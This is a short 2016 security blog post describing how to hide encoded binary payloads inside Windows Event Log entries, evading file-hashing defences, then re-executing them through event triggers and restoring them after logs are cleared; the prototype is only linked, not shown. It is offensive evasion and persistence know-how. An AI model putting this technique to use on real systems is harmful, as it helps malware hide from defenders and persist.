Friday, January 22, 2016

You Can Run And You Can Hide...

With increased scrutiny of files written to disk, one is left with the question; where could I stash binary content and execute it later?  There are lots of places.  Image files, Registry, etc...

One place that I have found convenient is the Event Log.  Some log types allow you to write binary data into the log entry. One example is the WSH logs.  I think VSS to, but haven't tested.  Anyway, there are probably others...

This matters, because many security products are recording and hashing any executable file written to disk.

So first we create our binary and encode/encrypt it or whatever.

Based on what I found, you are limited on the WSH logs to about 31389 bytes.

https://msdn.microsoft.com/EN-US/library/windows/desktop/aa363679.aspx

Plenty of space for a small foothold.

If you have larger binaries, I've included code to split and reassemble.

Once the content is securely stashed in the Event Log You can revive it via an Event Log Trigger or some other mechanism.

http://blogs.technet.com/b/wincat/archive/2011/08/25/trigger-a-powershell-script-from-a-windows-event.aspx

Things to consider.
1.  If the event log is cleared...
Well you need to replace the content. So you could attach a trigger to the clear log event perhaps to rehydrate.
Other areas to explore would be writing to custom logs as described here:
http://www.codeproject.com/Articles/39218/How-To-Create-a-Windows-Event-Log-and-Write-your-C

2.  You may consider adjusting log retention.
https://technet.microsoft.com/en-us/library/cc721981.aspx

There are probably better ideas, and other tricks here to explore.  I'd be curious to get your feedback.

Here's a full protoype.

https://gist.github.com/subTee/08d9954b685ce2584f22


Thats all for now.




Cheers,

Casey
@subTee


No comments:

Post a Comment